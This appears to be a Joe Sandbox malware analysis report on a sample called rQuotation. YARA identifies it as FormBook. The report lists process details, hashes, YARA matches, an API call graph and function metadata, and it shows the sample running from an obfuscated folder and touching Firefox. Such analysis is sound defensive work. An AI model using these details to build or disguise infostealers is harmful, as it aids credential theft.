                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:22:07:57
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe"
                                                                                                                                                                                                                                              Imagebase:0xb90000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:22:08:09
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.1%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                                                                                                                                                Signature Coverage:13.4%
                                                                                                                                                                                                                                                Total number of Nodes:134
                                                                                                                                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                                                                                                                                execution_graph 93423 1702b60 LdrInitializeThunk 93280 86fe83 93283 86ed83 93280->93283 93286 86d003 93283->93286 93285 86ed9c 93287 86d01d 93286->93287 93288 86d02e RtlFreeHeap 93287->93288 93288->93285 93289 864f23 93290 864f3f 93289->93290 93291 864f67 93290->93291 93292 864f7b 93290->93292 93293 86cc93 NtClose 93291->93293 93299 86cc93 93292->93299 93295 864f70 93293->93295 93296 864f84 93302 86eea3 RtlAllocateHeap 93296->93302 93298 864f8f 93300 86ccb0 93299->93300 93301 86ccc1 NtClose 93300->93301 93301->93296 93302->93298 93303 86fe23 93304 86fe33 93303->93304 93305 86fe39 93303->93305 93308 86ee63 93305->93308 93307 86fe5f 93311 86cfb3 93308->93311 93310 86ee7e 93310->93307 93312 86cfd0 93311->93312 93313 86cfe1 RtlAllocateHeap 93312->93313 93313->93310 93314 86c263 93315 86c280 93314->93315 93318 1702df0 LdrInitializeThunk 93315->93318 93316 86c2a8 93318->93316 93424 8652b3 93428 8652cc 93424->93428 93425 865317 93426 86ed83 RtlFreeHeap 93425->93426 93427 865327 93426->93427 93428->93425 93429 86535a 93428->93429 93431 86535f 93428->93431 93430 86ed83 RtlFreeHeap 93429->93430 93430->93431 93319 85aa83 93320 85aaf5 93319->93320 93321 85aa9b 93319->93321 93321->93320 93323 85ea03 93321->93323 93324 85ea29 93323->93324 93328 85eb26 93324->93328 93329 86fec3 RtlAllocateHeap RtlFreeHeap 93324->93329 93326 85eac4 93326->93328 93330 86c2b3 93326->93330 93328->93320 93329->93326 93331 86c2d0 93330->93331 93334 1702c0a 93331->93334 93332 86c2fc 93332->93328 93335 1702c11 93334->93335 93336 1702c1f LdrInitializeThunk 93334->93336 93335->93332 93336->93332 93337 8544e3 93338 8544fd 93337->93338 93343 857cb3 93338->93343 93340 85451b 93341 85454f PostThreadMessageW 93340->93341 93342 854560 93340->93342 93341->93342 93344 857cd7 93343->93344 93345 857d13 LdrLoadDll 93344->93345 93346 857cde 93344->93346 93345->93346 93346->93340 93432 8548f3 93434 8548c6 93432->93434 93433 8548f2 93434->93433 93435 85b7f3 NtClose 93434->93435 93435->93434 93436 853f73 93437 853f8f 93436->93437 93440 86cf13 93437->93440 93441 86cf30 93440->93441 93444 1702c70 LdrInitializeThunk 93441->93444 93442 853f95 93444->93442 93347 841a28 93348 841a41 93347->93348 93351 8702f3 93348->93351 93354 86e933 93351->93354 93355 86e959 93354->93355 93366 847193 93355->93366 93357 86e96f 93365 841a9c 93357->93365 93369 85b603 93357->93369 93359 86e98e 93362 86e9a3 93359->93362 93384 86d053 93359->93384 93380 8687f3 93362->93380 93363 86e9bd 93364 86d053 ExitProcess 93363->93364 93364->93365 93368 8471a0 93366->93368 93387 856973 93366->93387 93368->93357 93370 85b62f 93369->93370 93398 85b4f3 93370->93398 93373 85b674 93376 85b690 93373->93376 93378 86cc93 NtClose 93373->93378 93374 85b65c 93375 85b667 93374->93375 93377 86cc93 NtClose 93374->93377 93375->93359 93376->93359 93377->93375 93379 85b686 93378->93379 93379->93359 93381 868855 93380->93381 93383 868862 93381->93383 93409 858b23 93381->93409 93383->93363 93385 86d06d 93384->93385 93386 86d07e ExitProcess 93385->93386 93386->93362 93388 856990 93387->93388 93390 8569a9 93388->93390 93391 86d6f3 93388->93391 93390->93368 93393 86d70d 93391->93393 93392 86d73c 93392->93390 93393->93392 93394 86c2b3 LdrInitializeThunk 93393->93394 93395 86d79c 93394->93395 93396 86ed83 RtlFreeHeap 93395->93396 93397 86d7b5 93396->93397 93397->93390 93399 85b5e9 93398->93399 93400 85b50d 93398->93400 93399->93373 93399->93374 93404 86c353 93400->93404 93403 86cc93 NtClose 93403->93399 93405 86c36d 93404->93405 93408 17035c0 LdrInitializeThunk 93405->93408 93406 85b5dd 93406->93403 93408->93406 93410 858b41 93409->93410 93416 85905b 93410->93416 93417 854153 93410->93417 93412 858c7a 93413 86ed83 RtlFreeHeap 93412->93413 93412->93416 93414 858c92 93413->93414 93415 86d053 ExitProcess 93414->93415 93414->93416 93415->93416 93416->93383 93421 854173 93417->93421 93419 8541dc 93419->93412 93420 8541d2 93420->93412 93421->93419 93422 85b913 RtlFreeHeap LdrInitializeThunk 93421->93422 93422->93420 93445 859278 93446 86cc93 NtClose 93445->93446 93447 859282 93446->93447

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00857CB3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 75 857cb3-857ccf 76 857cd7-857cdc 75->76 77 857cd2 call 86f963 75->77 78 857ce2-857cf0 call 86ff63 76->78 79 857cde-857ce1 76->79 77->76 82 857d00-857d11 call 86e403 78->82 83 857cf2-857cfd call 870203 78->83 88 857d13-857d27 LdrLoadDll 82->88 89 857d2a-857d2d 82->89 83->82 88->89
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00857D25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 57e48f437d241a639378227bd1e8ce3a1f23e3b9917681a0bd4417694f65be95
                                                                                                                                                                                                                                                • Instruction ID: 33efae34173839ef519cf255350c18d28eeb1db1a9d7aea1a332ba3e0299d422
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57e48f437d241a639378227bd1e8ce3a1f23e3b9917681a0bd4417694f65be95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89010CB5D0020DABDB10DAA4DC46FADB778EB54304F1081A5ED18D7241FA31EA198B92
                                                                                                                                                                                                                                                Function 0086CC93 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 108 86cc93-86cccf call 844623 call 86def3 NtClose
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0086CCCA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                • Opcode ID: f8d33248dd749a7e87692bc31110c87a906272626809aadd8f21c7f22df8aa87
                                                                                                                                                                                                                                                • Instruction ID: 28ce892a3c119f7d20a990e17fbb4ae77d621dea45da98508c360e1d541084cc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d33248dd749a7e87692bc31110c87a906272626809aadd8f21c7f22df8aa87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73E04632604304BBD220EA6EDC02F9B776CEFC6710F018419FA09AB242C7B1B91186A2
                                                                                                                                                                                                                                                Function 01702B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 126 1702b60-1702b6c LdrInitializeThunk
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 002f0276833cfa497716172d34573b5ac96c60c6ab7050e437dc94e1099b2bb8
                                                                                                                                                                                                                                                • Instruction ID: 303c684bc625a8e30155136965f9a11d375cdd934296fd773830e69912d4ea8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 002f0276833cfa497716172d34573b5ac96c60c6ab7050e437dc94e1099b2bb8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14900262256400034305715C4414616900A97E1201B55C031E10145A0DC6258A916226
                                                                                                                                                                                                                                                Function 01702DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 76697d5127d853aa67e1929212e28fc58df3fb53277eb54e78f8c7512ff9c705
                                                                                                                                                                                                                                                • Instruction ID: 2eee14576784d90666d29e4471d0251e91a2671cb37d16f1c13eb5aa82aa2606
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76697d5127d853aa67e1929212e28fc58df3fb53277eb54e78f8c7512ff9c705
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2290023225540413D311715C4504707500997D1241F95C422A0424568DD7568B52A222
                                                                                                                                                                                                                                                Function 01702C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 127 1702c70-1702c7c LdrInitializeThunk
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: d07f7c2c80b48dcc8042bf82a2499aba5dc84a080d09d6c6c36b71f5ffa3445d
                                                                                                                                                                                                                                                • Instruction ID: df347039c994c2c61539318e00d401e06eaa9a61d124cafbdb757c560c0751d2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d07f7c2c80b48dcc8042bf82a2499aba5dc84a080d09d6c6c36b71f5ffa3445d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB90023225548803D310715C840474A500597D1301F59C421A4424668DC7958A917222
                                                                                                                                                                                                                                                Function 017035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 913da5868286b2f73ce337ee689448ef7a11d34c285dc6265886156caeee1080
                                                                                                                                                                                                                                                • Instruction ID: a63d35ad978c2bf2f20045124798b43f2fbf8723e7a9cbcc3f90025d936517a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 913da5868286b2f73ce337ee689448ef7a11d34c285dc6265886156caeee1080
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5690023265950403D300715C4514706600597D1201F65C421A0424578DC7958B5166A3
                                                                                                                                                                                                                                                Function 00858B23 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d07ebda108bbd3814ffd214d1798f3abee6991fe013687f03e46a8353ea30eb1
                                                                                                                                                                                                                                                • Instruction ID: 9a3c7cd4c598311b8a1f942aecdae12bacd779cd6e36b0cb36e29a27d6c58a65
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d07ebda108bbd3814ffd214d1798f3abee6991fe013687f03e46a8353ea30eb1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFF17E71D0021AEFDB24DF54CC85AAEB7B9FF48301F1481AAE905E7241DB706A49CFA1
                                                                                                                                                                                                                                                Function 00854457 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(x5R95Rwl,00000111,00000000,00000000), ref: 0085455A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: x5R95Rwl$x5R95Rwl
                                                                                                                                                                                                                                                • API String ID: 1836367815-242397096
                                                                                                                                                                                                                                                • Opcode ID: 5068104fa0a4492b1e5ea17ef0277cae05e99165ae1623a8cb3a579d8460eceb
                                                                                                                                                                                                                                                • Instruction ID: 08f8e670fb2da7db980f9d922a3235bd0859e134e91432c6d17717b52e1123a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5068104fa0a4492b1e5ea17ef0277cae05e99165ae1623a8cb3a579d8460eceb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4321077190114DBADB21EBA48C81EDF7B7CEB82254F444058FD40E7141D6354E4A87A1
                                                                                                                                                                                                                                                Function 008544D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 21 8544d5-8544d7 22 854467-854475 21->22 23 8544d9-85454d call 86ee23 call 86f833 call 857cb3 call 8445d3 call 8653f3 21->23 24 854477 22->24 25 85445e-854475 22->25 40 85456d-854573 23->40 41 85454f-85455e PostThreadMessageW 23->41 27 854485-854496 24->27 28 854479-854483 24->28 25->24 25->25 28->27 41->40 42 854560-85456a 41->42 42->40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(x5R95Rwl,00000111,00000000,00000000), ref: 0085455A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: x5R95Rwl$x5R95Rwl
                                                                                                                                                                                                                                                • API String ID: 1836367815-242397096
                                                                                                                                                                                                                                                • Opcode ID: a7cbd951371824c9a2cc7c25da5f83deba04ff99de35df0e9bf9b32d8c766afd
                                                                                                                                                                                                                                                • Instruction ID: 7a45ef0f8d5eaf6b653aa85bede7b9388058f80bd6c34fc7dab6402981dbe1df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7cbd951371824c9a2cc7c25da5f83deba04ff99de35df0e9bf9b32d8c766afd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28213672E0114DBBEB10EBA48C82EDFBB7CFF92358F548158FD40A7141D6344A4A8BA1
                                                                                                                                                                                                                                                Function 008544E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 43 8544e3-8544f5 44 8544fd-85454d call 86f833 call 857cb3 call 8445d3 call 8653f3 43->44 45 8544f8 call 86ee23 43->45 54 85456d-854573 44->54 55 85454f-85455e PostThreadMessageW 44->55 45->44 55->54 56 854560-85456a 55->56 56->54
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(x5R95Rwl,00000111,00000000,00000000), ref: 0085455A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: x5R95Rwl$x5R95Rwl
                                                                                                                                                                                                                                                • API String ID: 1836367815-242397096
                                                                                                                                                                                                                                                • Opcode ID: bd300988c28401954e3d4e434ac4fd9d5bfc62f40d07e2a9d5fe02d085c4d063
                                                                                                                                                                                                                                                • Instruction ID: f8f1ea444061287eec4c4ad90563ae118ad07a25fbf8d9cff9f6963f23a687a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd300988c28401954e3d4e434ac4fd9d5bfc62f40d07e2a9d5fe02d085c4d063
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F70184B2D4021C7ADB10ABE49C82DEF7B7CEF41694F458064FA04A7141D6785E4A4BB2
                                                                                                                                                                                                                                                Function 00857D74 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 90 857d74-857d76 91 857d06-857d11 90->91 92 857d78-857d9d 90->92 93 857d13-857d27 LdrLoadDll 91->93 94 857d2a-857d2d 91->94 96 857d9f-857da4 92->96 97 857d28-857d29 92->97 93->94 97->94
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00857D25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: f5c47e96840c4ac031de7d3be806c961a6c36f9f53a5ae51361cc1ce8909e8a6
                                                                                                                                                                                                                                                • Instruction ID: 5ab4e31e5a59a180b47bdd991113788d6290209ae97c8b9284a43e1cec94c2ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5c47e96840c4ac031de7d3be806c961a6c36f9f53a5ae51361cc1ce8909e8a6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCF0A07590460EABDF06CF94E841AB9B3F4FF00319F108195DC58DB6A0F634FA1A8B81
                                                                                                                                                                                                                                                Function 0086D003 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 103 86d003-86d044 call 844623 call 86def3 RtlFreeHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E2C10750,00000007,00000000,00000004,00000000,00857534,000000F4), ref: 0086D03F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                • Opcode ID: 12002d4605d1f8e16948a12c7761a92a041e4e0615d2bda637914433a93947b5
                                                                                                                                                                                                                                                • Instruction ID: cf649febbeb21a2c94a33f7954dbc2f7583f8331c191fba6d521c265cea2ee46
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12002d4605d1f8e16948a12c7761a92a041e4e0615d2bda637914433a93947b5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE06D726043487BD614EE5DDC41F9B33ACEF89710F004418F908A7241CA70B9108AB6
                                                                                                                                                                                                                                                Function 0086CFB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 98 86cfb3-86cff7 call 844623 call 86def3 RtlAllocateHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0085EAC4,?,?,00000000,?,0085EAC4,?,?,?), ref: 0086CFF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
